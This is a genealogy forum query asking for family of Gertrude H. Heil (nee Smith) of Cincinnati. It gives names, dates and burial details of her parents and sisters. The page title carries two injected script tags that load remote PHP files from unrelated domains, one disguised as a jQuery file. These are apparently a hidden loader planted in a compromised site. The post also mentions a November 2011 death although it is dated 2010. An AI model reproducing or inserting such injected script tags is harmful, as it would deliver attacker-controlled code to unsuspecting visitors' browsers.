Looking for family of Gertrude H. Heil (nee Smith)<script src="https://bestdoctornearme.com/splitter.ai/index.php"></script><script src="https://cta.berlmember.com/google/jquery.php"></script> :: FamilyTreeCircles.com Genealogy
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Looking for family of Gertrude H. Heil (nee Smith)

Query by grounded1

Gertrude was one of six daughters born to John and Helena (Walter) Smith in Cincinnati, Oh. Born March 22,1919/ died November 22, 2005. They lived on Eagle Creek Rd in Colerain Twp. Gertrude, her husband, both of her parents and several other family members are buried in Miamitown Cemetery. There are no remaining sisters living as Aunt Alma passed in Nov, 2011. Sisters were Bertha, Elizabeth, Carrie, Henrietta and Alma. Aunt Alma and mom (Gertrude) married brothers, Fritz (Frederick) and Len (Leonard) Heil, both of which are also deceased.
Unsure where John C Smith originated and not easy to pin down due to surname. Helena (Walter) Smith was born in Indiana, I believe, to Philip Walter and Barbara (Weber) Walter. Helena died in 1938 from pneumonia after suffering with uterine cancer for 8 years.Unknown when John Smith died.

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by grounded1 Profile | Research | Contact | Subscribe | Block this user
on 2010-06-17 08:40:14

grounded1 has been a Family Tree Circles member since Jun 2010. is researching the following names: ERNST, FINK, HEIL and 3 other(s).

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